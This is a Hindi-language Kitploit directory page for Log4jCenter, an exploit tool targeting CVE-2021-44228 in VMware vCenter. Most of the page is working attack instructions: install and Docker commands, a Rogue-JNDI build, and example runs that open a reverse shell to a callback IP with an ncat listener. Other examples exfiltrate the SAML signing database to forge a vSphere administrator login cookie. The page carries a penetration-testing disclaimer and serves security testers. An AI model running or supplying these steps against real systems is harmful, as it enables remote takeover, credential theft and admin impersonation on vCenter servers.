Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Log4jCenter — vCenter में CVE-2021-44228 का दोहन करके रिमोट कोड निष्पादन और भी बहुत कुछ। | Kitploit
उपकरण/GitHubGitHub/puzzlepeaches/log4jcenter
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubpuzzlepeaches/log4jcenter

Log4jCenter

vCenter में CVE-2021-44228 का दोहन करके रिमोट कोड निष्पादन और भी बहुत कुछ।

रिपॉजिटरी देखें
105194 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Log4jCenter

vCenter में CVE-2021-44228 का दोहन करके रिमोट कोड एक्ज़ीक्यूशन और बहुत कुछ। शोषण का विवरण देने वाला ब्लॉग पोस्ट नीचे दिया गया है:

  • VMWare vCenter में Log4j कमज़ोरियों का दोहन कैसे करें

क्यों?

इस कमज़ोरी के प्रूफ ऑफ कॉन्सेप्ट (PoC) बिखरे हुए हैं और इन्हें मैन्युअल रूप से निष्पादित करना पड़ता है। यह रिपॉज़िटरी शोषण प्रक्रिया को स्वचालित करती है और शोषण के बाद संभव होने वाले एक अतिरिक्त अटैक पथ को भी प्रदर्शित करती है।

इंस्टॉल

इस रिपॉज़िटरी का उपयोग मैन्युअल रूप से या Docker के साथ किया जा सकता है।

मैन्युअल इंस्टॉल

शोषण को मैन्युअल रूप से डाउनलोड करने और चलाने के लिए, निम्नलिखित चरणों को निष्पादित करें। सबसे पहले, सुनिश्चित करें कि आपके अटैकिंग होस्ट पर Java और Maven स्थापित हैं। Debian-आधारित ऑपरेटिंग सिस्टम पर apt का उपयोग करके ऐसा करने के लिए, निम्न कमांड चलाएँ:

root@kitploit:~
apt update && apt install openjdk-11-jre maven

GitHub रिपॉज़िटरी को क्लोन करें और सभी python आवश्यकताएँ स्थापित करें:

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jCenter \
    && cd Log4jCenter && pip3 install -r requirements.txt

Log4jCenter रिपॉज़िटरी के रूट से, नीचे दिए गए कमांड का उपयोग करके Rogue-Jndi प्रोजेक्ट को कंपाइल करें:

root@kitploit:~
mvn package -f utils/rogue-jndi/

Docker इंस्टॉल

पहले, सुनिश्चित करें कि आपके अटैकिंग होस्ट पर Docker स्थापित है। (मैं आपको यह करने का तरीका नहीं बताऊँगा)

उसके बाद, रिपॉज़िटरी को क्लोन करने और जिस Docker इमेज का हम उपयोग करेंगे उसे बनाने के लिए निम्नलिखित कमांड निष्पादित करें।

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jCenter \
    && cd Log4jCenter && docker build -t log4jcenter .

कंटेनर चलाने के लिए, अपने कमांड लाइन फ़्लैग्स जोड़कर निम्नलिखित जैसा कमांड चलाएँ। उदाहरण के लिए, नीचे दिया गया कमांड vCenter का शोषण करने और रिवर्स शेल पाने के लिए उपयोग किया जाएगा। ध्यान दें कि कंटेनर रिवर्स शेल को कैप्चर नहीं करेगा। आपको एक अलग शेल सेशन में ncat लिसनर बनाना होगा:

root@kitploit:~
docker run -it -v $(pwd)/loot:/Log4jCenter/loot -p 8090:8090 -p 1389:1389 log4jcenter \ 
    -t 10.100.100.1 -i 192.168.1.1 -p 4444 -r

उपयोग

root@kitploit:~
usage: exploit.py [-h] -t IP -i CALLBACK [-p PORT] [-e] [-r]

optional arguments:
  -h, --help            show this help message and exit
  -t IP, --target IP    vCenter Host IP
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.
  -e, --exfiltrate      Module to pull SAML DB
  -r, --revshell        Module to establish reverse shell

उदाहरण

अपने लोकल सिस्टम पर स्थापित टूल का उपयोग करके रिवर्स शेल प्राप्त करें:

root@kitploit:~
python3 exploit.py -t vcenter.acme.com -i 10.10.10.1 -p 4444 -r

Docker कंटेनर के भीतर से SAML साइनिंग डेटाबेस को एक्सफ़िल्ट्रेट करें:

root@kitploit:~
docker run -it -v $(pwd)/loot:/Log4jCenter/loot -p 1389:1389 -p 8090:8090 log4jcenter \
    -t 10.100.100.1 -i 192.168.1.1 -e

नोट्स

  • किसी अज्ञात कारण से, स्क्रिप्ट के पहले रन के बाद रिवर्स शेल पेलोड सक्रिय नहीं हो सकता है। कॉलबैक पाने के लिए आपको शोषण को कुछ बार चलाना पड़ सकता है। मैं इसकी जाँच करूँगा और भविष्य के रिलीज़ में इसका फिक्स शामिल करूँगा।
  • utils निर्देशिका में रिपॉज़िटरी vcenter_saml_login शामिल है। आप vCenter SAML साइनिंग डेटाबेस को एक्सफ़िल्ट्रेट करने और vSphere के लिए एक एडमिनिस्ट्रेटिव लॉगिन कुकी उत्पन्न करने के लिए इसका उपयोग e फ़्लैग के साथ कर सकते हैं। आपको आवश्यकताओं को अलग से स्थापित करना होगा।
  • डिफेंडरों के लिए, आप जल्द ही आने वाले पैच या यहाँ दिए गए वर्कअराउंड का उपयोग करके इस समस्या को कम कर सकते हैं।

अस्वीकरण

यह टूल पेनेट्रेशन टेस्टिंग के दौरान उपयोग के लिए डिज़ाइन किया गया है; पूर्व पारस्परिक सहमति के बिना लक्ष्यों पर हमला करने के लिए इस टूल का उपयोग अवैध है। सभी लागू स्थानीय, राज्य और संघीय कानूनों का पालन करना अंतिम उपयोगकर्ता की ज़िम्मेदारी है। डेवलपर्स कोई दायित्व नहीं लेते हैं और इस प्रोग्राम के किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं हैं।

टूल डाउनलोड करें